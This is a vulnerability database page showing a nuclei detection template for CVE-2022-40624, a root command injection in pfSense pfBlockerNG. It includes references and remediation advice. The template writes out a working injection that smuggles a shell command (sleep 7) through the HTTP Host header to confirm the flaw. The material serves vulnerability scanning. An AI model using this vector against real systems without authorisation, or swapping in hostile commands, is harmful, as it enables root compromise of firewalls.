Lucene search
K

pfSense pfBlockerNG - OS Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

pfSense pfBlockerNG OS Command Injection allows remote attackers to execute arbitrary commands as root.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-40624
16 Jan 202509:28
circl
CNNVD
pfSense 操作系统命令注入漏洞
20 Dec 202200:00
cnnvd
CVE
CVE-2022-40624
20 Dec 202200:00
cve
Cvelist
CVE-2022-40624
20 Dec 202200:00
cvelist
NCSC
Vulnerability discovered in pfSense pfBlockerNG
21 Dec 202200:00
ncsc
NVD
CVE-2022-40624
20 Dec 202215:15
nvd
OSV
CVE-2022-40624
20 Dec 202215:15
osv
Prion
Design/Logic Flaw
20 Dec 202215:15
prion
Positive Technologies
PT-2022-25424 · Pfsense · Pfblockerng
20 Dec 202200:00
ptsecurity
RedhatCVE
CVE-2022-40624
22 May 202523:28
redhatcve
Rows per page
id: CVE-2022-40624

info:
  name: pfSense pfBlockerNG - OS Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header.
  impact: |
    Allows remote attackers to execute arbitrary code on the affected system
  remediation: |
    Update to the latest version of pfSense pfBlockerNG to mitigate CVE-2022-40624
  reference:
    - https://github.com/dhammon/pfBlockerNg-CVE-2022-40624
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40624
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40624
    cwe-id: CWE-78
    epss-score: 0.17107
    epss-percentile: 0.96706
    cpe: cpe:2.3:a:pfsense:pfblockerng:*:*:*:*:*:*:*:*
  metadata:
    vendor: pfsense
    product: pfblockerng
    shodan-query: "pfBlockerNG"
    fofa-query: "pfBlockerNG"
  tags: cve,cve2022,pfsense,pfblockerng,rce,sqli,netgate,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "GIF")'
          - 'contains(content_type, "image/gif")'
        condition: and
        internal: true

  - raw:
      - |+
        @timeout: 20s
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}' *; sleep 7; '

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - duration>=7
# digest: 490a0046304402204ef225d81651916adc1630f320eb10d44e253605a15a46bbed758628910329e80220035dd63894d7ef4a092c3f03ff22c69c1b8cc356d4b3c6b96013504b2306eb09:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
EPSS0.17107
SSVC
28